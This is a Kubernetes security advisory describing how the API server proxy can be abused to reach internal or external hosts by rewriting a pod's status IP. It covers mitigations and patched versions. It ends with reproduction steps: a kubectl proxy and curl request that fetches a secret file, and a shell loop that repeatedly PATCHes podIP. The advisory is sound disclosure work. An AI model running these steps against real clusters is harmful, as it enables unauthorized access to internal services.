It was reported to us by Michael Schubert of Kinvolk that the
Kubernetes API server can be used as a HTTP proxy to not only cluster
internal but also external target IP addresses. By modifying
addresses for an exposed deployment, an attacker can send HTTP
requests to servers within the network in which the Kubernetes API
Server is running.
It’s important to note that
nodeIP addresses are
typically a more locked-down attribute, meaning only control-plane,
kubelet, and admin roles have write access to pod status by default.
Write permission on the API server endpoint to
/api/v1/namespaces/$NS/pods/$POD/status should not be given to
actors that should not have the ability to direct pod traffic. Note
that these permission controls will be ineffective against users with
direct access to nodes, as they can impersonate the kubelet on that
After discussing with the appropriate SIGs we have come to the
conclusion that this is indeed a problem for operators running an API
server in a different network than the nodes.
It is partially mitigated by using SSH Tunnels, since the apiserver
routes proxy traffic through ssh tunnels to the node network. Note
that SSH Tunnels are only usable with the Google Compute Engine (gce)
cloud provider, and they are deprecated and will be removed in the
next Kubernetes release.
Since 1.10, it is partially mitigated by the default behavior of the
ServiceProxyAllowExternalIPs=false) which only allows the
service and pod proxy subresources to contact an endpoint IPs that
correspond to pod IPs (as reported in pod status).
Operators of the API server are strongly advised to operate the
Kubernetes API server in the same network as the nodes or firewall it
sufficiently. It is highly recommended to not run any other services
you wish to be secure and isolated on the same network as the cluster
unless you firewall it away from the cluster, specifically any
outbound connections from the API server to anything else. The
Kubernetes control plane has many user-configurable features
(aggregated APIs, dynamic admission webhooks, and conversion webhooks
coming soon) which involve the Kubernetes API server sourcing network
Thanks to Micah Hausler from AWS for making a patch that has now been
cherry-picked to the patch versions 1.10.12, 1.11.6, 1.12.4 and
1.13.1. The patch disables the proxy to loopback and linklocal. We
still recommend using a firewall to prevent access to all external
IPs. You can view the patch here:
https://github.com/kubernetes/kubernetes/pull/71980. Please be aware,
admission webhooks were not patched because it is common to host
webhooks on localhost. For webhooks, the attack vector is more
limited: webhooks must be a POST over https, no query strings, and the
response is not propagated to an end user.
Thanks Michael Schubert for the find and see below for steps to reproduce,
Jess on behalf of the Kubernetes Product Security Team
Steps to reproduce:
After PATCHing the pod and endpoint IP for a nginx deployment
(replicas: 1) and service with the IP address / port of the
target HTTP server, we can use curl as shown below to request the
very-secret.txt document from the target server:
kubectl proxy --port 8001 &; curl http://localhost:8001/api/v1/namespaces/default/services/nginx:32080/proxy/very-secret.txt
Please note: we have done the PATCHing of pod and endpoint IP in a
loop to make sure the target addresses and ports are not overwritten
by an update (updates happen very frequently).
while true; do curl -v -H 'Content-Type:application/json' -X GET \ http://localhost:$PORT/api/v1/namespaces/default/pods/$POD/status \ > $POD-orig.json cat $POD-orig.json|sed 's/"podIP": ".*",/"podIP": "'$NEWIP'",/g' > \ $POD-patched.json curl -v -H 'Content-Type:application/merge-patch+json' -X PATCH \ -d @$POD-patched.json \ http://localhost:$PORT/api/v1/namespaces/default/pods/$POD/status rm -f $POD-orig.json $POD-patched.json done